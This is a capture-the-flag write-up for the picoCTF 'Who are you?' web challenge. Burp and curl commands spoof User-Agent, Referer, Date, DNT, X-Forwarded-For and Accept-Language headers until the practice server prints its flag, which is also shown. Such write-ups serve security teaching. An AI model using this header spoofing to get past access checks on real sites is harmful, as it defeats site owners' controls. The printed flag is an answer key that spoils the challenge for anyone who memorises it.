## Method 1: burp suite(reccommend) use PROXY to intercept and send to REPEATER ``` GET / HTTP/1.1 Host: mercury.picoctf.net:38322 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: PicoBrowser //Only people who use the official PicoBrowser are allowed on this site! referer: mercury.picoctf.net:38322 //I don&#39;t trust users visiting from another site. Date: Wed, 01 Jun 2018 08:00:00 GMT. //Sorry, this site only worked in 2018. DNT:1 //I don&#39;t trust users who can be tracked. X-Forwarded-For: 109.75.228.0 //This website is only for people from Sweden. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: sv //You&#39;re in Sweden but you don&#39;t speak Swedish? Connection: close ``` ## Method 2: curl ``` ──(kali㉿kali)-[~] └─$ curl http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1073 100 1073 0 0 350 0 0:00:03 0:00:03 --:--:-- 351 <h3 style="color:red">Only people who use the official PicoBrowser are allowed on this site!</h3> ``` ``` ┌──(kali㉿kali)-[~] └─$ curl --user-agent "picobrowser" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don&#39;t trust users visiting from another site. [1] 65596 65597 grep: % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0don: No such file or directory ``` ``` ┌──(kali㉿kali)-[~] └─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1040 100 1040 0 0 2467 0 --:--:-- --:--:-- --:--:-- 2470 <h3 style="color:red">Sorry, this site only worked in 2018.</h3> ``` ``` ┌──(kali㉿kali)-[~] └─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1046 100 1046 0 0 2419 0 --:--:-- --:--:-- --:--:-- 2421 <h3 style="color:red">I don&#39;t trust users who can be tracked.</h3> ``` ``` ┌──(kali㉿kali)-[~] └─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1047 100 1047 0 0 2288 0 --:--:-- --:--:-- --:--:-- 2316 <h3 style="color:red">This website is only for people from Sweden.</h3> ``` ``` ┌──(kali㉿kali)-[~] └─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1056 100 1056 0 0 2402 0 --:--:-- --:--:-- --:--:-- 2410 <h3 style="color:red">You&#39;re in Sweden but you don&#39;t speak Swedish?</h3> ``` ``` ┌──(kali㉿kali)-[~] └─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1062 100 1062 0 0 2548 0 --:--:-- --:--:-- --:--:-- 2546 <h3 style="color:green">What can I say except, you are welcome</h3> ``` ``` ┌──(kali㉿kali)-[~] └─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ <!DOCTYPE html> <html lang="en"> <head> <title>Who are you?</title> <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet"> <link href="https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css" rel="stylesheet"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> </head> <body> <div class="container"> <div class="jumbotron"> <p class="lead"></p> <div class="row"> <div class="col-xs-12 col-sm-12 col-md-12"> <h3 style="color:green">What can I say except, you are welcome</h3> </div> </div> <br/> <b>picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}</b> </div> <footer class="footer"> <p>&copy; PicoCTF</p> </footer> </div> <script> $(document).ready(function(){ $(".close").click(function(){ $("myAlert").alert("close"); }); }); </script> </body> </html> ``` ``` ┌──(kali㉿kali)-[~] └─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep pico % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1062 100 1062 0 0 100 0 0:00:10 0:00:10 --:--:-- 220 <b>picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}</b> ``` ## ref: X-Forwarded-For: https://developer.mozilla.org/zh-TW/docs/Web/HTTP/Headers/X-Forwarded-For